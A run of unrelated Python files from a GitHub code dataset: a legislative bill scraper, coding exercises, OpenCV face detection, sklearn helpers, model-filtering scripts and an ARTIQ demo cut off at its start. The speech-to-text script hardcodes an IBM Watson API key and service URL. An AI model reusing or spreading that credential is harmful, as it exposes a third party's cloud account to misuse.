fiftystates.scrape.votes import VoteScraper, Vote\nfrom datetime import datetime\nimport xlrd\nimport urllib\nimport lxml.etree\n\n\nclass OHBillScraper(BillScraper):\n state = 'oh'\n def scrape(self, chamber, session):\n\n if int(session) < 128:\n raise NoDataForPeriod(year)\n\n if chamber == 'upper':\n self.scrape_house_bills(session)\n elif chamber == 'lower':\n self.scrape_senate_bills(session)\n\n def scrape_house_bills(self, session):\n\n house_bills_url = 'http://www.lsc.state.oh.us/status%s/hb.xls' % session\n house_jointres_url = 'http://www.lsc.state.oh.us/status%s/hjr.xls' % session\n house_concurres_url = 'http://www.lsc.state.oh.us/status%s/hcr.xls' % session\n files = (house_bills_url, house_jointres_url, house_concurres_url)\n\n for house_file in files:\n\n house_bills_file = urllib.urlopen(house_file).read()\n f = open('oh_bills.xls','w')\n f.write(house_bills_file)\n f.close()\n \n \n wb = xlrd.open_workbook('oh_bills.xls')\n sh = wb.sheet_by_index(0)\n \n house_file = 
str(house_file)\n if len(str(house_file)) == 44:\n file_type = house_file[len(house_file) - 7:len(house_file)-4]\n else:\n file_type = house_file[len(house_file) - 6:len(house_file)-4]\n\n for rownum in range(1, sh.nrows):\n \n bill_id = file_type + str(int(rownum))\n bill_title = str(sh.cell(rownum, 3).value) \n bill = Bill( session, 'upper', bill_id, bill_title)\n bill.add_sponsor( 'primary', str(sh.cell(rownum, 1).value) )\n\n if sh.cell(rownum, 2).value is not '':\n bill.add_sponsor( 'cosponsor', str(sh.cell(rownum, 2).value) )\n\n actor = \"\"\n\n #Actions - starts column after bill title\n for colnum in range( 4, sh.ncols - 1):\n \n coltitle = str(sh.cell(0, colnum).value)\n cell = sh.cell(rownum, colnum) \n\n if len(coltitle) != 0:\n\n if coltitle.split()[0] == 'House':\n actor = \"upper\"\n elif coltitle.split()[0] == 'Senate':\n actor = \"lower\"\n elif coltitle.split()[-1] == 'Governor':\n actor = \"Governor\"\n else:\n actor = actor\n \n action = str(sh.cell( 0, colnum).value)\n date = cell.value\n \n if type(cell.value) == float:\n date = str(xlrd.xldate_as_tuple(date, 0))\n date = datetime.strptime(date, \"(%Y, %m, %d, %H, %M, %S)\")\n bill.add_action(actor, action, date) \n\n bill.add_source(house_file)\n self.scrape_votes(bill, file_type, rownum, session)\n\n self.save_bill(bill)\n\n\n def scrape_senate_bills(self, session):\n\n senate_bills_url = 'http://www.lsc.state.oh.us/status%s/sb.xls' % session\n senate_jointres_url = 'http://www.lsc.state.oh.us/status%s/sjr.xls' % session\n senate_concurres_url = 'http://www.lsc.state.oh.us/status%s/scr.xls' % session\n files = [senate_bills_url, senate_jointres_url, senate_concurres_url]\n\n for senate_file in files:\n\n senate_bills_file = urllib.urlopen(senate_file).read()\n f = open('oh_bills.xls','w')\n f.write(senate_bills_file)\n f.close()\n\n wb = xlrd.open_workbook('oh_bills.xls')\n sh = wb.sheet_by_index(0)\n\n senate_file = str(senate_file)\n if len(str(senate_file)) == 44:\n file_type = senate_file[len(senate_file) - 7:len(senate_file)-4]\n else:\n file_type = senate_file[len(senate_file) - 6:len(senate_file)-4]\n\n for rownum in range(1, sh.nrows):\n\n bill_id = file_type + str(int(rownum))\n bill_title = str(sh.cell(rownum, 3).value)\n bill = Bill( session, 'lower', bill_id, bill_title)\n bill.add_sponsor( 'primary', str(sh.cell(rownum, 1).value) )\n\n if sh.cell(rownum, 2).value is not '':\n bill.add_sponsor( 'cosponsor', str(sh.cell(rownum, 2).value) )\n\n actor = \"\"\n\n #Actions - starts column after bill title\n for colnum in range( 4, sh.ncols - 1):\n\n coltitle = str(sh.cell(0, colnum).value)\n cell = sh.cell(rownum, colnum)\n\n if len(coltitle) != 0:\n\n if coltitle.split()[0] == 'House':\n actor = \"upper\"\n elif coltitle.split()[0] == 'Senate':\n actor = \"lower\"\n elif coltitle.split()[0] == 'Gov.':\n actor = \"Governor\"\n elif coltitle.split()[-1] == 'Gov.':\n actor = \"Governor\"\n elif coltitle.split()[-1] == 'Governor':\n actor = \"Governor\"\n else:\n actor = actor\n\n action = str(sh.cell( 0, colnum).value)\n date = cell.value\n\n if type(cell.value) == float:\n date = str(xlrd.xldate_as_tuple(date, 0))\n date = datetime.strptime(date, \"(%Y, %m, %d, %H, %M, %S)\")\n bill.add_action(actor, action, date)\n\n bill.add_source(senate_file)\n self.scrape_votes(bill, file_type, rownum, session)\n\n self.save_bill(bill)\n\n def scrape_votes(self, bill, file_type, number, session):\n vote_url = 'http://www.legislature.state.oh.us/votes.cfm?ID=' + session + '_' + file_type + '_' + str(number)\n with 
self.urlopen(vote_url) as page:\n root = lxml.etree.fromstring(page, lxml.etree.HTMLParser())\n \n save_date = None\n for el in root.xpath('/html/body/table/tr[3]/td/table/tr[1]/td[2][@class=\"bigPanel\"]/blockquote/font/table'):\n for mr in root.xpath('/html/body/table/tr[3]/td/table/tr[1]/td[2][@class=\"bigPanel\"]/blockquote/font/table/tr[position() > 1]'):\n \n yes_count = 0\n yes_placement = 0\n no_count = 0\n no_placement = 0 \n\n date = mr.xpath('string(td/font/a)')\n date = date.lstrip()\n date = date.rstrip()\n info = mr.xpath('string(td[2]/font)') \n\n #makes sure that date is saved \n if len(date.split()) > 0:\n date = datetime.strptime(date, \"%m/%d/%Y\")\n save_date = date\n\n #figures out the number of votes for each way\n #also figures out placement of yes and no voters starts for later iteration\n if info.split()[0] == 'Yeas':\n \n #yes votes\n yes_count = info.split()[2]\n\n #no votes\n for voter in range(3, len(info.split())):\n if info.split()[voter] == '-':\n no_count = info.split()[voter + 1]\n no_placement = voter + 2\n yes_placement = voter - 2\n \n #motion and chamber\n if info.split()[-1] == 'details':\n motion = info[0:len(info)-10]\n motion = motion.lstrip()\n motion = motion.rstrip()\n chamber = motion.split()[0]\n \n if chamber == \"Senate\":\n chamber = \"upper\"\n else:\n chamber = \"lower\"\n\n #passed or not (decided only by which count is larger; compare as ints, since the counts are parsed as strings)\n if int(yes_count) > int(no_count):\n passed = True\n else:\n passed = False\n\n vote = Vote(chamber, save_date, motion, passed, int(yes_count), int(no_count), other_count = 0)\n\n #adding in yea voters\n for voters in range(3, yes_placement):\n legis = \"\"\n initials = 0 \n\n #checks to see if the next name is actually an initial\n if len(info.split()[voters+1]) < 2:\n legis = legis + info.split()[voters] + \" \" + info.split()[voters + 1]\n elif len(info.split()[voters]) < 2:\n initials = 1\n else:\n legis = legis + info.split()[voters]\n \n if initials < 1:\n vote.yes(legis)\n \n #adding in no voters\n for voters in range(no_placement, len(info.split())):\n legis = \"\" \n initials = 0\n\n #checks to see if the next name is actually an initial\n if (info.split()[voters] != info.split()[-1]) and (len(info.split()[voters+1]) < 2):\n legis = legis + info.split()[voters] + \" \" + info.split()[voters + 1]\n elif len(info.split()[voters]) < 2:\n initials = 1\n else:\n legis = legis + info.split()[voters]\n\n if initials < 1:\n vote.no(legis)\n \n #gets rid of blank votes\n if yes_count > 0 or no_count > 0:\n vote.add_source(vote_url)\n bill.add_vote(vote) \n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/oh/bills.py","file_name":"bills.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23826213851","text":"# dwarfs = {}\n# while True:\n# command = input()\n# if command == \"Once upon a time\":\n# break\n# name, color, physics = command.split(' <:> ')\n# if (name, color) not in dwarfs.keys():\n# dwarfs[(name, color)] = int(physics)\n# else:\n# if dwarfs[(name, color)] < int(physics):\n# dwarfs[(name, color)] = int(physics)\n#\n# sorted_by_physics = dict(sorted(dwarfs.items(), key=lambda x: (x[1], x[0][1]), reverse=True))\n# sorted__by_hat_color = dict(sorted(sorted_by_physics.items(), key=lambda x: x[0][1], reverse=True))\n#\n# for key, value in sorted_by_physics.items():\n# print(f\"({key[1]}) {key[0]} <-> {value}\")\n\ndwarfs = {}\nwhile True:\n command = input()\n if 
command == \"Once upon a time\":\n break\n name, color, physics = command.split(' <:> ')\n if color not in dwarfs.keys():\n dwarfs[color] = [[int(physics), name]]\n else:\n name_exists = False\n for value in dwarfs[color]:\n if name in value:\n name_exists = True\n if int(value[0]) < int(physics):\n value[0] = int(physics)\n break\n if name_exists == False:\n dwarfs[color] += [[int(physics), name]]\nsorted_dwarfs_by_color_occurrence = dict(sorted(dwarfs.items(), key=lambda x: len(x[1]), reverse=True))\nnew_list = []\nfor key in sorted_dwarfs_by_color_occurrence.keys():\n for value in sorted_dwarfs_by_color_occurrence[key]:\n new_list.append((value[1], key, value[0]))\nsorted_result = sorted(new_list, key=lambda x: x[2], reverse=True)\nfor list in sorted_result:\n print(f\"({list[1]}) {list[0]} <-> {list[2]}\")\n\n\n\n\n","repo_name":"teodoraNI/Python_Fundamentals","sub_path":"Dictionaries/More_exercises/snow_white.py","file_name":"snow_white.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70842853635","text":"# for Face Detection we need to convert the image into gray scale as face detection does not depend on the color or skin tone, but depends only on the edges of the face\r\nimport cv2 as cv\r\nimport numpy as np\r\nimg=cv.imread('openCV\\pic\\Aswin.jpeg')\r\ncv.imshow('Aswin',img)\r\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\r\ncv.imshow('Gray',gray)\r\nhaar_cascade=cv.CascadeClassifier('Haar_face.xml') # tpe the folder name in which the classifier is stored within the quatation marks\r\nfaces_rect = haar_cascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=3)\r\nprint(f'Number of faces={len(faces_rect)}')\r\nfor(x,y,w,h) in faces_rect:\r\n cv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),thickness=2)\r\ncv.imshow('Detected Faces',img)\r\n\r\n\r\n\r\ncv.waitKey(0)","repo_name":"ASWINSEKHAR/OPENCV_WORKS","sub_path":"Face_detec.py","file_name":"Face_detec.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7167520103","text":"from application import db\n\nfrom .base import KeyedBase\n\n\nclass AnonymousUser:\n is_authenticated = False\n\n\nclass User(KeyedBase, db.AlchemyBase):\n __tablename__ = 'users'\n\n firebase_uid = db.Column(db.String(128), unique=True)\n\n @property\n def is_authenticated(self):\n return True\n","repo_name":"onecrayon/redspoon","sub_path":"application/models/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37719652342","text":"from DecisionTree import Id3\nfrom Data.car import CarData\nimport os\n\n\ndef non_numeric_id3_test():\n # Construct datasets\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n data = CarData.Data()\n data.initialize_data_from_file(dir_path + '/../../Data/car/train.csv')\n\n metrics = {0: 'information_gain', 1: 'majority_error_gain', 2: 'gini_index_gain'}\n\n # Test tree\n test_data = CarData.Data()\n test_data.initialize_data_from_file(dir_path + '/../../Data/car/test.csv')\n\n # Detect Noise\n print(\"Begin detecting noise\")\n noise_count = 0\n for example in data.examples:\n for other_example in data.examples:\n if example == other_example:\n if example.label != other_example.label:\n noise_count += 1\n\n print(\"Detected \" + str(noise_count) + \" features of noise\\n\")\n\n # Begin 
prompts\n use_averages = input(\"Would you like to calculate averages over all metrics? y/n \")\n\n if use_averages == \"y\":\n calculate_averages(data, test_data, metrics, 7)\n\n else:\n tree_depth = int(input(\"Please enter desired tree depth [1 - 6] (0 to run entire tree):\"))\n if tree_depth == 0:\n tree_depth = float(\"inf\")\n\n metric_choice = int(input(\"Please enter a number for choice of metric:\\n0: Information Gain\\n\"\n \"1. Majority Error\\n2. Gini Index\\n\"))\n metric = metrics[metric_choice]\n\n # Run ID3\n height = run_id3(data, test_data, metric, tree_depth, None, None)\n print(\"Max height: \" + str(height))\n\n\ndef run_id3(data, test_data, metric, tree_depth, data_percents, train_data_percents):\n id3 = Id3.Id3(metric)\n print(\"\\n--- Using Tree level \" + str(tree_depth) + \" ---\")\n id3.fit(data.examples, data.attributes, None, data.labels, 0, tree_depth)\n\n correct_results = 0\n for example in test_data.examples:\n if example.get_label() == id3.predict(example):\n correct_results += 1\n\n percentage = float(correct_results) / float(len(test_data.examples))\n if data_percents is not None:\n data_percents.append(percentage)\n\n print(\"Test Error: \" + \"%.16f\" % (1.0 - percentage))\n\n correct_results = 0\n for example in data.examples:\n if example.get_label() == id3.predict(example):\n correct_results += 1\n\n percentage = float(correct_results) / float(len(data.examples))\n if train_data_percents is not None:\n train_data_percents.append(percentage)\n\n print(\"Training Error: \" + \"%.16f\" % (1.0 - percentage))\n max_height = id3.max_height\n id3.reset_max_height()\n\n return max_height\n\n\ndef calculate_averages(data, test_data, metrics, max_depth):\n information_gains = []\n information_gains_train = []\n max_errors = []\n max_errors_train = []\n ginis = []\n ginis_train = []\n values = [information_gains, max_errors, ginis]\n values_train = [information_gains_train, max_errors_train, ginis_train]\n metric_names = {0: \" Information Gain \", 1: \" Majority Error \", 2: \" Gini Index \"}\n\n max_j = 0\n for i in range(0, 3):\n print(\"\\n------------- \" + metric_names[i] + \" -------------\\n\")\n for j in range(1, max_depth):\n max_height = run_id3(data, test_data, metrics[i], j, values[i], values_train[i])\n if max_height < j:\n max_j = j\n break\n\n # Pop last value since it is a duplicate and we can no longer grow the tree\n if max_j != 0:\n values.pop()\n values_train.pop()\n\n # Calculate and print averages\n print(\"\\n-- Test data average for metrics --\")\n print(\"Information gain: \" + \"%.16f\" % (1.0 - average(values[0])))\n print(\"Majority Error: \" + \"%.16f\" % (1.0 - average(values[1])))\n print(\"Gini Index: \" + \"%.16f\" % (1.0 - average(values[2])))\n print(\"\\n-- Train data average for metrics --\")\n print(\"Information gain: \" + \"%.16f\" % (1.0 - average(values_train[0])))\n print(\"Majority Error: \" + \"%.16f\" % (1.0 - average(values_train[1])))\n print(\"Gini Index: \" + \"%.16f\" % (1.0 - average(values_train[2])))\n\n\ndef average(data):\n length = len(data)\n temp_sum = 0.0\n for element in data:\n temp_sum += element\n\n return temp_sum / float(length)\n","repo_name":"morsgiathatch/machine_learning","sub_path":"Tests/DecisionTreeTests/non_numeric_id3_test.py","file_name":"non_numeric_id3_test.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72605131395","text":"def elemordonatecresc(list):\r\n sortedlist = 
list[:]\r\n sortedlist.sort()\r\n if sortedlist == list:\r\n return True\r\n return False\r\n\r\n\r\ndef readfloatlist() -> list[float]:\r\n list = []\r\n givenstring = input(\"Dati lista cu elemente separate prin virgula\")\r\n numbers_as_string = givenstring.split(\",\")\r\n for x in numbers_as_string:\r\n list.append(float(x))\r\n return list\r\n\r\ndef readintlist() -> list[int]:\r\n list = []\r\n givenstring = input(\"Dati lista cu elemente separate prin virgula\")\r\n numbers_as_string = givenstring.split(\",\")\r\n for x in numbers_as_string:\r\n list.append(int(x))\r\n\r\n return list\r\n\r\n\r\ndef get_longest_sorted_asc(lst: list[int]) -> list[int]:\r\n '''\r\n Determina cea mai lunga subsecventa de nr ordonate crescator\r\n :param lst: lista nr intregi\r\n :return: cea mai lunga subsecventa de nr ordonate crescator\r\n '''\r\n subsecventamax = []\r\n for i in range(len(lst)):\r\n for j in range(i, len(lst)):\r\n if elemordonatecresc(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventamax):\r\n subsecventamax = lst[i:j + 1]\r\n return subsecventamax\r\n\r\n\r\ndef listwithzero(l):\r\n for x in l:\r\n if x != 0:\r\n return False\r\n return True\r\n\r\n\r\ndef get_longest_equal_int_real(lst: list[float]) -> list[float]:\r\n '''\r\n Determina cea mai lunga subsecventa de numere cu popr. ca toate au partea fractionara = partea intreaga\r\n :param lst: lista cu numere reale\r\n :return: cea mai lunga subsecventa cu proprietatea ca toate numerele au pi = pf\r\n '''\r\n subsecventamax = []\r\n for i in range(len(lst)):\r\n for j in range(i, len(lst)):\r\n if listwithzero(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventamax):\r\n subsecventamax = lst[i:j + 1]\r\n return subsecventamax\r\n\r\n\r\ndef is_palindrome(n):\r\n '''\r\n Verifica daca un numar este palindrom\r\n :param n: numar intreg\r\n :return: Retruneaza adevarat daca nr este palindrom si False in caz contrar\r\n '''\r\n if n < 10:\r\n return False\r\n ogl = 0\r\n aux = n\r\n while aux > 0:\r\n ogl = ogl * 10 + aux % 10\r\n aux = aux // 10\r\n if ogl == n:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef palindromelist(l):\r\n for x in l:\r\n if is_palindrome(x) is False:\r\n return False\r\n return True\r\n\r\n\r\ndef get_longest_all_palindromes(lst: list[int]) -> list[int]:\r\n '''\r\n Determina cea mai lunga subsecventa de numere cu popr. 
ca toate nr sunt palindrom\r\n :param lst: lista cu numere intregi\r\n :return: cea mai lunga subsecventa cu proprietatea ca toate numerele sunt palindrom\r\n '''\r\n subsecventamax = []\r\n for i in range(len(lst)):\r\n for j in range(i, len(lst)):\r\n if palindromelist(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventamax):\r\n subsecventamax = lst[i:j + 1]\r\n return subsecventamax\r\n\r\n\r\ndef test_get_longest_all_palindromes():\r\n assert get_longest_all_palindromes([]) == []\r\n assert get_longest_all_palindromes([12, 11, 22, 44, 54, 22]) == [11, 22, 44]\r\n assert get_longest_all_palindromes([12, 11, 22, 44, 54, 22, 66, 101, 202]) == [22, 66, 101, 202]\r\n\r\n\r\ndef test_elemordonatecresc():\r\n assert elemordonatecresc([]) is True\r\n assert elemordonatecresc([10, 4, 5]) is False\r\n assert elemordonatecresc([10, 20, 30]) is True\r\n\r\n\r\ndef test_get_longest_sorted_asc():\r\n assert get_longest_sorted_asc([]) == []\r\n assert get_longest_sorted_asc([1, 2, 0, 0]) == [1, 2]\r\n assert get_longest_sorted_asc([1, 2, 0, 0, 32, 0, 0, 0]) == [0, 0, 32]\r\n\r\n\r\ndef test_get_longest_equal_int_real():\r\n assert get_longest_equal_int_real([]) == []\r\n assert get_longest_equal_int_real([1, 2, 0, 0]) == [0.0, 0.0]\r\n assert get_longest_equal_int_real([1, 2, 0, 0 , 32, 0, 0, 0]) == [0.0, 0.0, 0.0]\r\n\r\n\r\ndef main():\r\n test_get_longest_sorted_asc()\r\n test_get_longest_equal_int_real()\r\n test_elemordonatecresc()\r\n print(\"\"\"\r\n 1, Determinati cea mai lunga subsecventa de numere ordonate crescator dintr un sir dat\r\n 2, Determinati cea mai lunga subsecventa cu proprietatea ca elementele au partea fractionara egala cu partea intreaga\r\n 3, Determinati cea mai lunga subsecventa cu proprietatea ca toate elem sunt palindrom\r\n x, Iesire\"\"\")\r\n while True:\r\n option = input(\"Selectati o functie\")\r\n if option == \"1\":\r\n l = readintlist()\r\n print(get_longest_sorted_asc(l))\r\n elif option == \"2\":\r\n l = readfloatlist()\r\n print(get_longest_equal_int_real(l))\r\n elif option == '3':\r\n l = readintlist()\r\n print(get_longest_all_palindromes(l))\r\n elif option == \"x\":\r\n break\r\n else:\r\n print(\"Nu ati selectat o optiune valida!\")\r\n\r\n\r\nmain()\r\n","repo_name":"AP-MI-2021/lab-3-alexandrulupei","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"71027222914","text":"#using ibm watson api\n#pip3 install --upgrade \"ibm-watson>=5.1.0\"\nfrom ibm_watson import SpeechToTextV1 \nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nimport json\nfrom os.path import join, dirname\n\n#authentication\nauthenticator = IAMAuthenticator('UhIENYMPXTuuukXYROghF8hYWFZSrC3z5HI2tm7iobsw')\nspeech_to_text = SpeechToTextV1(\n authenticator=authenticator\n)\nspeech_to_text.set_service_url('https://api.eu-gb.speech-to-text.watson.cloud.ibm.com/instances/9aa7928c-72da-423d-b870-e415fe6c6478')\n\nmodel = speech_to_text.get_model('en-US_NarrowbandModel').get_result()\nprint(json.dumps(model, indent=2))\n\ndef generateText():\n #downsampling the audio\n from pydub import AudioSegment as am #pip3 install pydub\n sound = am.from_file('./resources/sample_audio_2.wav', format='wav')\n sound = sound.set_frame_rate(16000)\n sound.export('./resources/sample_audio.wav', format='wav')\n\n #open the downsampled file that was just exported, not the original\n with open(join(dirname(__file__), './resources/sample_audio.wav'),'rb') as audio_file:\n speech_recognition_results = 
speech_to_text.recognize(\n audio=audio_file,\n content_type='audio/wav',\n smart_formatting=True,\n continuous=True\n ).get_result()\n print(speech_recognition_results) #output as json \n\n #converting the output to string\n # {'results' [{-> 'alternatives' [{-> 'transcripts': ans}]}]}\n #we need to concatenate all the ans to get final result\n final_result = \"\"\n result_list = speech_recognition_results.get('results')\n\n for sent_dict in result_list:\n alt = sent_dict.get('alternatives')\n for trans_dict in alt:\n for transcript in trans_dict.get('transcript'):\n final_result = final_result + transcript\n final_result = final_result + \". \"\n\n #writing the converted to text file\n convertedText = open(\"generatedFile.txt\",\"a\")\n convertedText.write(final_result)\n convertedText.close()","repo_name":"manasi2905/Summary-of-Text","sub_path":"voiceToText.py","file_name":"voiceToText.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13437576476","text":"import pandas as pd\nimport numpy as np\nimport re\nfrom sklearn.model_selection import cross_val_score, cross_validate, train_test_split\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor, export_graphviz, plot_tree\n\nimport glob\n\n# visualization\nimport graphviz\nimport matplotlib.pyplot as plt\nfrom imageio import imread\n\nplt.rcParams[\"font.size\"] = 16\n\n# Custom function to customize the tree plot and hide values and samples\ndef custom_plot_tree(tree_model, feature_names=None, class_names=None, **kwargs):\n \"\"\"\n Customizes and displays a tree plot for a scikit-learn Decision Tree Classifier.\n\n Parameters:\n - tree (sklearn.tree.DecisionTreeClassifier): The trained Decision Tree Classifier to visualize.\n - width: width of the matplotlib plot in inches \n - height: height of the matplotlib plot in inches \n - feature_names (list or None): A list of feature names to label the tree nodes with feature names.\n If None, generic feature names will be used.\n - class_names (list or None): A list of class names to label the tree nodes with class names.\n If None, generic class names will be used.\n - **kwargs: Additional keyword arguments to be passed to the `sklearn.tree.plot_tree` function.\n\n Returns:\n - None: The function displays the customized tree plot using Matplotlib.\n \n This function customizes the appearance of a Decision Tree plot generated by the scikit-learn\n `plot_tree` function. 
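# A hedged sketch of flattening the Watson JSON without the
# character-by-character loop used in the voiceToText record above
# (iterating a string yields single characters, so that loop works but
# obscures the intent). The response shape is assumed from the comments
# in the original code; `join_transcripts` is a hypothetical helper,
# not part of the ibm-watson API.
def join_transcripts(results):
    sentences = []
    for sent_dict in results.get('results', []):
        for trans_dict in sent_dict.get('alternatives', []):
            text = trans_dict.get('transcript', '').strip()
            if text:
                sentences.append(text)
    # join with sentence separators, keeping the original ". " suffix
    return '. '.join(sentences) + '. ' if sentences else ''

# e.g. join_transcripts({'results': [{'alternatives': [{'transcript': 'hello '}]}]})
# returns 'hello. '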
It hides both the samples and values in each node of the tree plot\n for improved visualization.\n \"\"\" \n plot_tree(tree_model, \n feature_names=feature_names, \n class_names=class_names, \n filled=True, \n **kwargs)\n \n # Customize the appearance of the text elements for each node\n for text in plt.gca().texts:\n new_text = re.sub('samples = \\d+\\n', '', text.get_text()) # Hide samples\n text.set_text(new_text) \n \n plt.show()\n\ndef cross_validate_std(*args, **kwargs):\n \"\"\"Like cross_validate, except also gives the standard deviation of the score\"\"\"\n res = pd.DataFrame(cross_validate(*args, **kwargs))\n res_mean = res.mean()\n\n res_mean[\"std_test_score\"] = res[\"test_score\"].std()\n if \"train_score\" in res:\n res_mean[\"std_train_score\"] = res[\"train_score\"].std()\n return res_mean\n\ndef mean_std_cross_val_scores(model, X_train, y_train, **kwargs):\n \"\"\"\n Returns mean and std of cross validation\n\n Parameters\n ----------\n model :\n scikit-learn model\n X_train : numpy array or pandas DataFrame\n X in the training data\n y_train :\n y in the training data\n\n Returns\n ----------\n pandas Series with mean scores from cross_validation\n \"\"\"\n\n scores = cross_validate(model, X_train, y_train, **kwargs)\n\n mean_scores = pd.DataFrame(scores).mean()\n std_scores = pd.DataFrame(scores).std()\n out_col = []\n\n for i in range(len(mean_scores)):\n out_col.append((f\"%0.3f (+/- %0.3f)\" % (mean_scores.iloc[i], std_scores.iloc[i])))\n\n return pd.Series(data=out_col, index=mean_scores.index)","repo_name":"UBC-CS/cpsc330-2023W1","sub_path":"lectures/code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"28144252957","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCount the number of prime numbers less than a non-negative number, n.\n\nExample:\n\nInput: 10\nOutput: 4\nExplanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n\"\"\"\nfrom math import sqrt, floor\n\n\nclass Solution:\n def isPrimes(self, n: int) -> bool:\n for i in range(2, floor(sqrt(n)) + 1):\n if not n % i:\n return False\n return True\n\n def countPrimes(self, n: int) -> int:\n result = 0\n primes = [True] * n\n\n for i in range(2, n):\n if primes[i]:\n result += 1\n j = 2\n while i * j < n:\n primes[i * j] = False\n j += 1\n return result\n\n\nif __name__ == '__main__':\n a = Solution()\n print(a.countPrimes(2))\n print(a.countPrimes(10))\n print(a.countPrimes(999983))\n","repo_name":"heianhu/DataStructuresAndAlgorithm","sub_path":"算法/Leetcode/Easy/8.Math/2.Count Primes.py","file_name":"2.Count Primes.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"29547128309","text":"\"\"\"\nCreated on Thu May 4 15:25:34 2022\n\nTo filter structure information based\non different models\n\n0 : weir\n1 : culvert\n2 : pump\n3 : control structures\n\n*change end section indication part manually\n\n@author: Michael Getachew Tadesse\n\n\"\"\"\n\nimport os \nimport logging\nimport pandas as pd\n\n# select structure type\n\nstr_type = \"ctrl_stru\"\n\nstruct = {\"weirs\" : \"0\",\n \"culverts\" : \"1\",\n \"pumps\" : \"2\",\n \"ctrl_stru\" : \"3\"\n }\n\n\n# define model file locations \nweirs = \"D:\\\\Hazen and Sawyer\\\\MIKE_Modeling_Group - Documents\\\\BCB\\\\data\\\\weirs\"\nculverts = \"D:\\\\Hazen and Sawyer\\\\MIKE_Modeling_Group - 
Documents\\\\BCB\\\\data\\\\culverts\"\npumps = \"\"\nbridges = \"\"\nctrl_stru = \"D:\\\\Hazen and Sawyer\\\\MIKE_Modeling_Group - Documents\\\\BCB\\\\data\\\\ctrl_stru\"\n\n\n# read list of filtered out struture names\ndat = pd.read_csv(\"structures.csv\")\n# dat = pd.read_csv(\"test_structures.csv\")\n\n\n\n\nprint(int(struct[str_type])/1.0)\ndat = dat[dat['Str_Type'] == int(struct[str_type])/1.0]\ndat.reset_index(inplace = True)\nprint(dat)\n\n\n# define model file names\nmodelName = {\n \"BCB_C1\" : \"bcb.txt\",\n \"CCWHP\" : \"cc.txt\",\n \"SLWCI\" : \"slcwi.txt\"\n}\n\n##############################################\n# change the saving file name\n##############################################\n\n# start logging\nlogging.basicConfig(filename= str_type + \".log\", encoding='utf-8', level=logging.DEBUG)\n\nwith open(\"bcbUpdated\" + str_type + \".txt\", \"w\") as f:\n\n # select structure type\n os.chdir(str_type)\n \n for ii in range(len(dat)):\n id = dat['Str_ID'][ii]\n branch = dat['Str_BrName'][ii]\n # chainage = dat['Str_Ch'][ii].astype(str).split(\".0\")[0]\n chainage = dat['Str_Ch'][ii]\n model = dat['Model'][ii]\n \n \n # print(\"Location = {}, {}, {}\".format(id, chainage, model))\n \n infile = open(modelName[model], 'r').readlines()\n\n prev_line = \"\"\n copyLines = False\n \n for line in infile:\n # print(line)\n\n # just for control structures - following selection\n if (\"Location = '{}', {}, '{}'\".format(branch, chainage, id) in line) | \\\n (\"Location = '{}', {}, '{}'\"\n .format(branch, chainage.astype(str).split(\".0\")[0], id) in line): \n # print(line)\n f.write(prev_line)\n # f.write(\"\\n\")\n copyLines = True\n \n logging.info(id)\n \n if copyLines:\n ######################################\n # change end line string\n ######################################\n if \"EndSect // control_str_data\" in line:\n f.write(line)\n # f.write(\"\\n\")\n break\n else: \n f.write(line)\n # f.write(\"\\n\")\n \n \n prev_line = line\n ","repo_name":"moinabyssinia/glrsta","sub_path":"others/structureFilter.py","file_name":"structureFilter.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70424153474","text":"import sys\nimport os\nimport select\n\nfrom artiq.experiment import *\nfrom artiq.coredevice.fmcdio_vhdci_eem import *\n\n\ndef chunker(seq, size):\n res = []\n for el in seq:\n res.append(el)\n if len(res) == size:\n yield res\n res = []\n if res:\n yield res\n\n\ndef is_enter_pressed() -> TBool:\n if os.name == \"nt\":\n if msvcrt.kbhit() and msvcrt.getch() == b\"\\r\":\n return True\n else:\n return False\n else:\n if select.select([sys.stdin, ], [], [], 0.0)[0]:\n sys.stdin.read(1)\n return True\n else:\n return False\n\n\nclass Demo(EnvExperiment):\n def build(self):\n self.setattr_device(\"core\")\n self.setattr_device(\"fmcdio_dirctl\")\n\n self.leds = dict()\n self.ttl_outs = dict()\n\n ddb = self.get_device_db()\n for name, desc in ddb.items():\n if isinstance(desc, dict) and desc[\"type\"] == \"local\":\n module, cls = desc[\"module\"], desc[\"class\"]\n if (module, cls) == 